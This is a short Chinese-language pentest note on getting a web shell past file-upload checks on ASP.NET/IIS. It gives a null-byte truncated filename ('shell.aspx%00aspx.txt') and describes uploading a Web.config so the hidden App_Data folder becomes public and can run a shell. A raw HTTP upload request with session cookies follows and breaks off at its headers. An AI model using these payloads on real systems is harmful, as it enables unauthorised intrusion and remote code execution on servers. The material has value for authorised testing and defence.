1.添加%00截断绕过:
shell.aspx%00aspx.txt
2.添加配置文件
App_Data包含应用程序数据文件,包括.mdf数据库文件、XML文件和其他数据存储文件#
#ASP.NET使用App_Data文件夹来存储应用程序的本地数据库,例如用于维护成员身份和角色信息的数据库#
#App_Data文件夹不像主目录下的其他网站目录那样是公共的#
#因为它是一个私有目录,IIS服务器出于安全原因将其隐藏#
#现在,我们将测试是否存在这样的目录#
#如果目录存在,我们将把它公开,这样我们就可以定义在其中运行shell所需的服务器函数#
#为此,我们将尝试加载一个特殊的服务器配置文件。这是一个Web.Config文件。有了这个,我们将绕过目录隐私#
#因此,该目录将是公共的,它将能够响应外部查询并运行shell。
POST /editor/assetmanager/assetmanager.asp?ffilter=&upload=Y HTTP/2
Host: www.pentest.com
Cookie: ASPSESSIONIDAERARBRS=ENGPNMICKHLIBMPLFGAAHKAO; ASPSESSIONIDAQXADDBC=KNEFNGNCLJGEAJMBDLPEKOHD; ASPSESSIONIDAUTADDBC=LNEFNGNCNICEJMMILLBLEBJC; ASPSESSIONIDSWRCCBAC=AHEHHDOCIFOLGLNPFDOKLJOF; ASPSESSIONIDSERDABAB=NCHHDEOCFPENHJCJPKHKMONG
Content-Length